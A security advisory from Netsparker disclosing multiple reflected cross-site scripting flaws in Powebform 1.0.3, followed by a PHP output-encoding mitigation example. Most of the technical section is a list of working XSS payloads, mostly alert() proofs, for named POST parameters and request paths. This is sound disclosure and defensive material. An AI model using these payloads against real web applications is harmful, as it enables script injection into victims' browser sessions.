Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3
Affected Software : Powebform 1.0.3
Affected Versions: 1.0.3
Vendor Homepage : https://sourceforge.net/projects/powebform/files/powebform/1.0.3/ 
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-007

Technical Details
--------------------

Proof-of-concept URLs, parameters and attack patterns for the XSS vulnerabilities in Powebform:

Url /powebform-1.0.3/page1.php
Parameter Name supp_fax
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C4A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name anum_item
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C5E)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_tele
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C42)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_post
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C3E)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add4
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C3A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C0A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C36)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C32)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name budget
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000BFA)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name dept
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0009C2)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_name
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C02)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name name
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000762)</scRipt>

Url /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>

Url /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_1
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_3
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000276)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name code_3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00027A)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name code_2
Parameter Type POST
Attack Pattern "><iMg src=N onerror=alert(9)>

Url /powebform-1.0.3/page2.php
Parameter Name code_1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C34)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C40)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000291)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000278)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name shipping
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000292)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_1
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000274)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_3
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>

Url /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>

For more information on cross-site scripting vulnerabilities, read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
08 Feb 2017 - Advisory released

Solution
--------------------
No solution available at the time of publishing of this advisory.
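
A general interim mitigation for operators, shown as an added example (not Powebform's code and not a vendor fix): HTML-encode every reflected POST value and build the form action from a fixed path rather than the request URI. The markup and helper names are hypothetical, and the example assumes the URI-based findings come from the request path being echoed into the page; only the parameter names and patterns are taken from the advisory.

```php
<?php
// Added example, not Powebform source. Markup and helper names are hypothetical.

/** Encode a value for HTML element content or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of making the call return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Read a POST field as a string; array-typed input (name[]=x) is dropped. */
function post_field(array $post, string $name): string
{
    $v = $post[$name] ?? '';
    return is_string($v) ? $v : '';
}

/** Render one text input with the submitted value reflected in encoded form. */
function render_input(string $name, array $post): string
{
    return sprintf('<input type="text" name="%s" value="%s">',
        h($name), h(post_field($post, $name)));
}

/** Open the form with a fixed action; the request URI is never echoed. */
function render_form_open(string $fixedAction): string
{
    return sprintf('<form method="post" action="%s">', h($fixedAction));
}

// Constructed request data reusing two patterns listed in the advisory.
$post = [
    'supp_fax' => '\'"--></style></scRipt><scRipt>alert(0x000C4A)</scRipt>',
    'quant_1'  => '"><scRipt>alert(9)</scRipt>',
];

echo render_form_open('page1.php'), "\n";
foreach (array_keys($post) as $name) {
    $html = render_input($name, $post);
    // After encoding, the only raw < and > left belong to our own <input> tag,
    // so the pattern can no longer close the attribute or open a new element.
    if (substr_count($html, '<') !== 1 || substr_count($html, '>') !== 1) {
        throw new RuntimeException("unencoded markup reflected for $name");
    }
    echo $html, "\n";
}
echo "</form>\n";
```

The `h()` helper covers HTML body and quoted-attribute contexts only; values placed inside a script block, a style block or an unquoted attribute need context-specific encoding.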

Credits & Authors
--------------------
These issues were discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. The Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions: Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.